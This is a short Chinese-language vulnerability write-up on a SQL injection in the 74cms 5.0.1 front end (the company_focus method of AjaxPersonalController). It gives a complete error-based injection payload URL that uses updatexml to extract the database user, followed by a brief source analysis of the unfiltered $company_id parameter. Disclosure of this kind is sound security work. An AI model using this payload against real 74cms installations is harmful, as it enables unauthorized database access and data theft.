74cms v5.0.1 前台 sql 注入

发布于 2024-11-08 11:45:08 字数 1153 浏览 1 评论 0

一、漏洞简介

74cms 5.0.1 前台 AjaxPersonalController.class.php 存在 SQL 注入

二、漏洞影响

三、复现过程

具体信息

文件位置:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php

方法:function company_focus($company_id)

是否需登录:需要

登录权限:普通用户即可

Payload:

http://0-sec.org/74cms/5.0.1/upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id [0]=match&company_id[1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) -- a

源码分析:

文件:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php

company_focus 方法是参数化函数,$company_id 参数是不经过 I 函数过滤的,所以只要 where 可以控制,那就可以注入

跟踪 add_focus(),发现 SQL 语句参数外部都可以控制,导致了注入漏洞

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

寄意

暂无简介

0 文章
0 评论
23 人气
更多

推荐作者

悲喜皆因你

文章 0 评论 0

亽野灬性zι浪

文章 0 评论 0

做个ˇ局外人

文章 0 评论 0

qq_QvE5B3

文章 0 评论 0

qq_E2Iff7

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文